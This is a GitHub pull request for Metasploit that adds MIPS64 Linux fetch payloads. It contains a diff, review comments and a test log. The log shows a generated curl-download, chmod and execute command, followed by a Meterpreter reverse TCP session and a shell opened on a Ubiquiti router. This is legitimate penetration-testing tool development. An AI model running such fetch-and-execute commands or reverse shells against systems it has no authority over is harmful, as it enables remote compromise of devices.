Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add MIPS64 Linux Fetch Payloads #18044

Merged
merged 3 commits into from Jun 2, 2023
Merged

Add MIPS64 Linux Fetch Payloads #18044

merged 3 commits into from Jun 2, 2023

Conversation

zeroSteiner
Copy link
Contributor

This adds MIPS64 fetch based payloads to the existing x64 ones we originally added.

I was able to test the cmd/linux/http/mips64/meterpreter_reverse_tcp with a Ubiquiti USG. This is related to #18016 and my comment here.

Testing

  • Use one of the new cmd/linux/http/mips64/* payloads
  • Configure the datastore options and start the handler
  • Generate the payload and run it
  • Get a session

@zeroSteiner
Drop size requirement and fix descriptions
8a0dfa5 
The size requriement is used when the adapted payload is executed from
the command line but that's not the case for the fetch payloads which
execute a command to fetch the payload from a URL. The payload size
doesn't matter because it's included in the executable file hosted at
the URL.
@zeroSteiner
Add MIPS64 fetch adapters
d7098aa
zeroSteiner
zeroSteiner commented May 30, 2023
View reviewed changes
lib/msf/core/payload/adapter/fetch.rb
Comment on lines -39 to -44
def compatible?(mod)
if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
return false
end
super
end
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This size restriction was carried over from some of the other adapters. The adapters prior to the fetch payloads executed the payload in the command instead of fetching it from a server. For that reason, the command could grow quite large depending on the payload that was selected. The fetch payloads place the adapted payload into an executable binary and request it from a server, so the executed command does not contain it and this the size doesn't matter.

@gwillcox-r7 gwillcox-r7 added payload rn-payload-enhancement release notes for enhanced payloads labels May 31, 2023
smcintyre-r7
smcintyre-r7 requested changes Jun 1, 2023
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You need to add the new payloads to the specs.

@smcintyre-r7 smcintyre-r7 added rn-modules release notes for new or majorly enhanced modules and removed rn-payload-enhancement release notes for enhanced payloads labels Jun 1, 2023
@bwatters-r7
Copy link
Contributor 

msf6 > use payload/cmd/linux/http/mips64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > show options

Module options (payload/cmd/linux/http/mips64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      KvMWXTbj         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set FETCH_SRVHOST 192.168.1.6
FETCH_SRVHOST => 192.168.1.6
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set verbose true
verbose => true
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler

[*] Command to run on remote host: curl -so /tmp/OAuhefDppmsz http://192.168.1.6:8080/JNadUtp7WutSvvbMBB9kcg; chmod +x /tmp/OAuhefDppmsz; /tmp/OAuhefDppmsz &
[*] Payload Handler Started as Job 0
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch Handler listening on 192.168.1.6:8080
[*] HTTP server started
[*] Adding resource /JNadUtp7WutSvvbMBB9kcg
[*] Started reverse TCP handler on 192.168.1.6:4444 
[*] Client 192.168.1.1 requested /JNadUtp7WutSvvbMBB9kcg
[*] Sending payload to 192.168.1.1 (curl/7.26.0)
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.1:47658) at 2023-06-01 11:30:45 -0500

msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           : Debian 7.11 (Linux 3.10.20-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : mips64/linux
meterpreter > shell
Process 3213 created.
Channel 1 created.
cat /proc/cpuinfo
system type		: UBNT_E120
machine			: Unknown
processor		: 0
cpu model		: Cavium Octeon+ V0.1
BogoMIPS		: 1000.00
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes, count: 2, address/irw mask: [0x0ffc, 0x0ffb]
isa			: mips1 mips2 mips3 mips4 mips5 mips64r2
ASEs implemented	:
shadow register sets	: 1
kscratch registers	: 0
core			: 0
VCED exceptions		: not available
VCEI exceptions		: not available

processor		: 1
cpu model		: Cavium Octeon+ V0.1
BogoMIPS		: 1000.00
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes, count: 2, address/irw mask: [0x0ffc, 0x0ffb]
isa			: mips1 mips2 mips3 mips4 mips5 mips64r2
ASEs implemented	:
shadow register sets	: 1
kscratch registers	: 0
core			: 1
VCED exceptions		: not available
VCEI exceptions		: not available

exit
meterpreter >

smcintyre-r7
smcintyre-r7 approved these changes Jun 2, 2023
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Specs have been added!

@bwatters-r7 bwatters-r7 merged commit 1e9d286 into rapid7:master Jun 2, 2023
30 checks passed
@bwatters-r7
Copy link
Contributor

Release Notes

Add MIPS64 Linux Fetch Payloads

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@bwatters-r7 bwatters-r7

Labels
payload rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@zeroSteiner @bwatters-r7 @smcintyre-r7 @gwillcox-r7